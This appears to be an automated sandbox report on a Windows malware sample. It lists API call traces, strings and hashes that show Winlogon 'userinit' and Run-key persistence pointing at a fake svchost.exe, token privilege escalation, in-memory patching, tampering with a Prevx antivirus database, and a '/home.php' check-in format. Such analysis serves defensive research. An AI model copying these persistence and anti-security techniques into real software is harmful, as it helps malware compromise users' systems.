                                                                                                                                                                                                            • String ID: %02X$%53%59%53%54%45%4D%21%38%39%39%35%35%32%21%46%32%41%41%36%45%43%33$%s!%s!%08X$InstallDate$SYSTEM$SYSTEM!899552!F2AA6EC3$Software\Microsoft\Windows NT\CurrentVersion$SystemDrive
                                                                                                                                                                                                            • API String ID: 3299431409-4203512814
                                                                                                                                                                                                            • Opcode ID: 187bc02db73aa95a63557cd599164ac45811e5ca5a7c600b1390523a2a1e4718
                                                                                                                                                                                                            • Instruction ID: 158ab4a0c10846fc958ccc3d6e6da7cd483fd8fc3d3daaaabb5894d9a012793b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 187bc02db73aa95a63557cd599164ac45811e5ca5a7c600b1390523a2a1e4718
                                                                                                                                                                                                            • Instruction Fuzzy Hash: FD51B371E00215ABEB609BA99C89FFBBBFCEF84740F4445C5FB45E7140E6B099048BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA376
                                                                                                                                                                                                            • GetThreadPriority.KERNEL32(00000000,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000,02BC9730,02C0A04C), ref: 02BCA37D
                                                                                                                                                                                                            • GetTickCount.KERNEL32 ref: 02BCA386
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02BCA660,00000008,00000040,?,?,02BCA660,00000000,00000000,?,?,?,?,?,?,02BC98DA,00000000), ref: 02BCA3A7
                                                                                                                                                                                                            • VirtualAlloc.KERNEL32(00000000,00000012,00003000,00000040), ref: 02BCA3C6
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000000,00000012,00000040,?), ref: 02BCA3E2
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000000,00000004), ref: 02BCA3F8
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000068), ref: 02BCA406
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA411
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000001,-0000009C), ref: 02BCA424
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-00000081), ref: 02BCA435
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-00000074), ref: 02BCA444
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000024), ref: 02BCA453
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,-00000004), ref: 02BCA462
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000006,?), ref: 02BCA46A
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000002,-0000009D), ref: 02BCA47D
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000003,-000000C2), ref: 02BCA48E
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000004,-00000004), ref: 02BCA49D
                                                                                                                                                                                                            • InterlockedExchange.KERNEL32(00000005,00000000), ref: 02BCA4A9
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(00000005,00000012,?,00000000), ref: 02BCA4B3
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA4BB
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02BCA4C2
                                                                                                                                                                                                            • GetCurrentThread.KERNEL32 ref: 02BCA4FE
                                                                                                                                                                                                            • SetThreadPriority.KERNEL32(00000000), ref: 02BCA505
                                                                                                                                                                                                            • VirtualProtect.KERNEL32(02BCA660,00000008,00000000,02BCA660), ref: 02BCA51F
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: ExchangeInterlocked$Thread$Virtual$Protect$CurrentPriority$AllocCountTick
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 2984368831-0
                                                                                                                                                                                                            • Opcode ID: 14d2e6fa02e86fc0251e8f8c704f311d44a7bc6cdd0bb4c0c96774fa4bec9a69
                                                                                                                                                                                                            • Instruction ID: f7c71a103ccc7892c38f7103a7c162f61ca3cff32fec252707734791691db138
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 14d2e6fa02e86fc0251e8f8c704f311d44a7bc6cdd0bb4c0c96774fa4bec9a69
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 45518371940619AFE710AF74CC46FAE77ACFF49310F154928FA86E7180DB78A9518BA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(\\.\KmxAgent,00000000,00000000,00000000,00000003,00000080,00000000), ref: 00402313
                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,86000054,000000B4,000000B4,?,00000004,?,00000000), ref: 00402343
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040234A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CloseControlCreateDeviceFileHandle
                                                                                                                                                                                                            • String ID: "$"$0$4$D$E$E$S$T$\\.\KmxAgent$d$e$g$m$m$s$t$t
                                                                                                                                                                                                            • API String ID: 33631002-3172865025
                                                                                                                                                                                                            • Opcode ID: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                            • Instruction ID: 06d3a0cb986842bbdb89303b9aef8d686ca65c5df34e7f93c7eeed45953a557b
                                                                                                                                                                                                            • Opcode Fuzzy Hash: e3633c6c15a619a578893c9fcc23eeae2132ba8b67b3abd9a16308d2c93bcb98
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8E4184B0D01358DEEB20CF9599887DEBFB5BB04309F5081ADD6586B241C7BA0A89CF55
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: memset$strstrstrtol
                                                                                                                                                                                                            • String ID: %s%s$1676d5775e05c50b46baa5579d4fc7$eyuioa$qwrtpsdfghjklzxcvbnm
                                                                                                                                                                                                            • API String ID: 600650289-3097137778
                                                                                                                                                                                                            • Opcode ID: 4f4c37c10b3d4599806e1099ee89ce023c2fcd839dbc5b1263a6e402b1d9fc37
                                                                                                                                                                                                            • Instruction ID: 8ee7fbeca3c9419a6d255ef3a4d546c1bdcf1295b1c9e212ebfe8d6b2ac355af
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f4c37c10b3d4599806e1099ee89ce023c2fcd839dbc5b1263a6e402b1d9fc37
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 98715731E442585BDB62CB789C81BEEBBB9AF48700F1444E8EB49A3281D3B45E55CB60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BCA1CA
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BCA1D7
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 02BCA1F4
                                                                                                                                                                                                            • CreateThread.KERNEL32(00000000,00000000,Function_00019E40,?,00000000,00000000), ref: 02BCA23E
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,?), ref: 02BCA256
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BCA267
                                                                                                                                                                                                            • GetTempPathA.KERNEL32(00000104,?), ref: 02BCA279
                                                                                                                                                                                                            • GetTempFileNameA.KERNEL32(?,00000000,00000000,?), ref: 02BCA291
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BCA2B1
                                                                                                                                                                                                            • SetFileAttributesA.KERNEL32(?,00000000,00000000,/home.php,?,00000001,?,?,00000001,00000000), ref: 02BCA327
                                                                                                                                                                                                            • DeleteFileA.KERNEL32(?), ref: 02BCA334
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$HandleInformationPathTemp$AttributesBackslashCloseCreateDeleteEnvironmentNameThreadVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: %53%59%53%54%45%4D%21%38%39%39%35%35%32%21%46%32%41%41%36%45%43%33$/home.php$SystemDrive$name=%s&port=%u
                                                                                                                                                                                                            • API String ID: 1291007772-4156733716
                                                                                                                                                                                                            • Opcode ID: 359a8cbc3885d1a87f32b14dbcab757fbb2c65f05758bc98149ea850ee801541
                                                                                                                                                                                                            • Instruction ID: 7126f4abbb2175ad21ff2f71c5131645bae63e7bf1a1feeccad054480074d7e9
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 359a8cbc3885d1a87f32b14dbcab757fbb2c65f05758bc98149ea850ee801541
                                                                                                                                                                                                            • Instruction Fuzzy Hash: B6419271A8021C7BEB24DBA4CC49FEA777DEB44700F5045D8BB05EB180EAF19A848F60
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • SHGetFolderPathA.SHELL32(00000000,00000023,00000000,00000000,?), ref: 0040255C
                                                                                                                                                                                                            • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000,00000000), ref: 004025C0
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017A8,00000000,00000000), ref: 004025E3
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 004025F8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000B98,00000000,00000000), ref: 00402604
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402613
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017E4,00000000,00000000), ref: 0040261F
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 0040262E
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,000017DC,00000000,00000000), ref: 0040263A
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402649
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00003380,00000000,00000000), ref: 00402655
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000001,?,00000000), ref: 00402664
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00402667
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$PointerWrite$CloseCreateFolderHandlePath
                                                                                                                                                                                                            • String ID: \PrevxCSI\csidb.csi
                                                                                                                                                                                                            • API String ID: 606440919-2829233815
                                                                                                                                                                                                            • Opcode ID: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                            • Instruction ID: 8b448ea0795f31fda95dadee176b54ca291314fb6d6361d02f59f031212173a5
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 79a3c48366173e2e4432591fd9d0211125a55660129729a41d6644ffa549504a
                                                                                                                                                                                                            • Instruction Fuzzy Hash: D93128716842187EF311EB90DC9AFEE7768EB89B00F104165F304AA1D0DBF16A45CBE9
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • IsUserAnAdmin.SHELL32 ref: 02BB3325
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 02BB3344
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 02BB3351
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 02BB336E
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 02BB3389
                                                                                                                                                                                                            • RegOpenKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000101,00000000), ref: 02BB33A7
                                                                                                                                                                                                            • RegOpenKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000101,00000000), ref: 02BB33DE
                                                                                                                                                                                                            • RegQueryValueExA.KERNEL32(00000000,userinit,00000000,00000001,C:\Windows\apppatch\svchost.exe,00000104), ref: 02BB33FC
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 02BB340A
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • SystemDrive, xrefs: 02BB333F
                                                                                                                                                                                                            • C:\Windows\apppatch\svchost.exe, xrefs: 02BB33B4, 02BB33EB
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 02BB33D4
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 02BB339D
                                                                                                                                                                                                            • userinit, xrefs: 02BB33F6
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Open$AdminBackslashCloseEnvironmentInformationPathQueryUserValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: C:\Windows\apppatch\svchost.exe$SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3780845138-4271125494
                                                                                                                                                                                                            • Opcode ID: 1146f43d57696100eead7d7928bd35a1d992f06279c3760900a734b05e9a1650
                                                                                                                                                                                                            • Instruction ID: 513e0c634cbdad5360db91fa4aefcad941860d62ea0146aff4c01a43713d611d
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1146f43d57696100eead7d7928bd35a1d992f06279c3760900a734b05e9a1650
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5D21F975A80308FBFB24DB90CC8AFEEB778EB44B44F904588B705A6180D7F16658CB65
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000), ref: 02BB74C6
                                                                                                                                                                                                            • GetFileSizeEx.KERNEL32(00000000,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB74E4
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,?,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB750D
                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB7514
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BB7527
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000001), ref: 02BB7553
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 02BB7563
                                                                                                                                                                                                            • ReadFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 02BB7572
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02BB7585
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB7594
                                                                                                                                                                                                            • HeapValidate.KERNEL32(00000000), ref: 02BB759B
                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 02BB75A8
                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 02BB75AF
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB75CF
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 02BB75E0
                                                                                                                                                                                                            • IsBadWritePtr.KERNEL32(?,00000004,76F8F380,00000000,00000000,?,?,02BC4E91,?,00000000,?,?,00000000), ref: 02BB75F0
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: FileHeap$Process$AllocateChangeCloseCreateFindFreeHandleInformationLockNotificationPointerReadSizeUnlockValidateWritememset
                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                            • API String ID: 213124939-0
                                                                                                                                                                                                            • Opcode ID: ff7d09f1c406c82f4812dfae6d1d18174498ab6f0bf456797ae3c7ec2d930700
                                                                                                                                                                                                            • Instruction ID: f05557522342c282cabe9d1606515fad29341b953299d1aa206b0e5b30a41fe4
                                                                                                                                                                                                            • Opcode Fuzzy Hash: ff7d09f1c406c82f4812dfae6d1d18174498ab6f0bf456797ae3c7ec2d930700
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1A41B072A40304BBEB319FB59C49FAFBBACEF84751F508654FA05A7181DBB49510CBA0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • CreateFileA.KERNEL32(00000000,C0000000,00000003,00000000,00000002,00000080,00000000,76F8F380,00000000,00000000,?,00000000,00000000,?,00000000), ref: 02BB738D
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentThread.KERNEL32 ref: 02BD5940
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenThreadToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5947
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetCurrentProcess.KERNEL32(00000020,02BC4D1B,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD5957
                                                                                                                                                                                                              • Part of subcall function 02BD5930: OpenProcessToken.ADVAPI32(00000000,?,?,?,?,02BC4D1B,?,?,00000000), ref: 02BD595E
                                                                                                                                                                                                              • Part of subcall function 02BD5930: LookupPrivilegeValueA.ADVAPI32(00000000,SeSecurityPrivilege,?), ref: 02BD5981
                                                                                                                                                                                                              • Part of subcall function 02BD5930: AdjustTokenPrivileges.KERNELBASE(02BC4D1B,00000000,00000001,00000000,00000000,00000000), ref: 02BD599B
                                                                                                                                                                                                              • Part of subcall function 02BD5930: GetLastError.KERNEL32 ref: 02BD59A5
                                                                                                                                                                                                              • Part of subcall function 02BD5930: FindCloseChangeNotification.KERNEL32(02BC4D1B), ref: 02BD59B6
                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(S:(ML;;NRNWNX;;;LW),00000001,00000000,00000000), ref: 02BB73B4
                                                                                                                                                                                                            • GetSecurityDescriptorSacl.ADVAPI32(?), ref: 02BB73D5
                                                                                                                                                                                                            • SetNamedSecurityInfoA.ADVAPI32(00000000,00000001,00000010,00000000,00000000,00000000,00000000), ref: 02BB73EE
                                                                                                                                                                                                            • LocalFree.KERNEL32(?), ref: 02BB73F8
                                                                                                                                                                                                            • SetFilePointer.KERNEL32(00000000), ref: 02BB740C
                                                                                                                                                                                                            • LockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB741B
                                                                                                                                                                                                            • WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB742D
                                                                                                                                                                                                            • UnlockFile.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 02BB743D
                                                                                                                                                                                                            • SetEndOfFile.KERNEL32(00000000), ref: 02BB744A
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BB746C
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BB747D
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C0E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: File$Security$DescriptorToken$CloseCurrentHandleOpenProcessThread$AdjustChangeConvertCreateErrorFindFreeInfoInformationLastLocalLockLookupNamedNotificationPointerPrivilegePrivilegesSaclStringUnlockValueWrite
                                                                                                                                                                                                            • String ID: S:(ML;;NRNWNX;;;LW)
                                                                                                                                                                                                            • API String ID: 2010133961-820036962
                                                                                                                                                                                                            • Opcode ID: 75e07169306e0444344d7d550945dcedee181debbb28766800361b3626da3fd7
                                                                                                                                                                                                            • Instruction ID: 396ef81e0774c3c0baa0333d3cdfe3a58da3b7d03874aff2f0b23c168e2ee6cc
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 75e07169306e0444344d7d550945dcedee181debbb28766800361b3626da3fd7
                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2419336A80208BBE7218F64DC89FEEBB6CEF84755F548155FE04DB1C0DBB0955187A0
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • RegCreateKeyExA.KERNEL32(80000002,software\microsoft\windows nt\currentversion\winlogon,00000000,00000000,00000000,00000102,00000000,?,00000000,00000000), ref: 0040296B
                                                                                                                                                                                                            • GetEnvironmentVariableA.KERNEL32(SystemDrive,?,00000104), ref: 00402986
                                                                                                                                                                                                            • PathAddBackslashA.SHLWAPI(?), ref: 00402993
                                                                                                                                                                                                            • GetVolumeInformationA.KERNEL32(?,00000000,00000000,000FF0FF,00000000,00000000,00000000,00000000), ref: 004029B0
                                                                                                                                                                                                            • _snprintf.MSVCRT ref: 004029CB
                                                                                                                                                                                                            • RegCreateKeyExA.ADVAPI32(80000001,software\microsoft\windows\currentversion\run,00000000,00000000,00000000,00000102,00000000,00000000,00000000), ref: 00402A1A
                                                                                                                                                                                                            • RegSetValueExA.KERNELBASE(00000000,userinit,00000000,00000001,?,?), ref: 00402A3E
                                                                                                                                                                                                            • RegFlushKey.ADVAPI32(00000000), ref: 00402A4D
                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00402A57
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            • software\microsoft\windows\currentversion\run, xrefs: 00402A10
                                                                                                                                                                                                            • SystemDrive, xrefs: 00402981
                                                                                                                                                                                                            • software\microsoft\windows nt\currentversion\winlogon, xrefs: 00402953
                                                                                                                                                                                                            • userinit, xrefs: 00402A38
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: Create$BackslashCloseEnvironmentFlushInformationPathValueVariableVolume_snprintf
                                                                                                                                                                                                            • String ID: SystemDrive$software\microsoft\windows nt\currentversion\winlogon$software\microsoft\windows\currentversion\run$userinit
                                                                                                                                                                                                            • API String ID: 3547530944-2324515132
                                                                                                                                                                                                            • Opcode ID: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction ID: cfc36ad3083988d5491cb46672b4500e56a1c5dd6b6f1e6a0940d5df759a06a8
                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15ecb4030802b486445de4a6135ce48a3b5379f8823ffe5b2d75d15eecc358be
                                                                                                                                                                                                            • Instruction Fuzzy Hash: F93147B5740305BBE720DB54DE4AFEA777CDB95B00F204155FB44BA1C0DAF4AA448BA8
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D27
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                            • FindCloseChangeNotification.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2580738627.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2580738627.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                            Yara matches
                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                            • API ID: CreateModule32SnapshotToolhelp32$ChangeCloseErrorFindFirstHandleInformationLastNextNotificationSwitchThreadmemset
                                                                                                                                                                                                            • String ID: .dll$kernel
                                                                                                                                                                                                            • API String ID: 1233480013-2375045364
                                                                                                                                                                                                            • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                            • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                            • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
                                                                                                                                                                                                            APIs
                                                                                                                                                                                                            • memset.MSVCRT ref: 02BD56A6
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56B7
                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 02BD56C0
                                                                                                                                                                                                            • SwitchToThread.KERNEL32 ref: 02BD56CF
                                                                                                                                                                                                            • CreateToolhelp32Snapshot.KERNEL32(00000008,?), ref: 02BD56D8
                                                                                                                                                                                                            • GetHandleInformation.KERNEL32(00000000,00000000), ref: 02BD56F8
                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 02BD5709
                                                                                                                                                                                                            • Module32First.KERNEL32(00000000,?), ref: 02BD572A
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(?,kernel), ref: 02BD574C
                                                                                                                                                                                                            • StrStrIA.SHLWAPI(00000000,.dll), ref: 02BD5758
                                                                                                                                                                                                            • Module32Next.KERNEL32(00000000,00000224), ref: 02BD5766
                                                                                                                                                                                                            Strings
                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                            • Source File: 00000002.00000002.2594339878.0000000002BB0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: true
                                                                                                                                                                                                            • Associated: 00000002.00000002.2594339878.0000000002C09000.00000040.00001000.00020000.00000000.sdmpDownload File
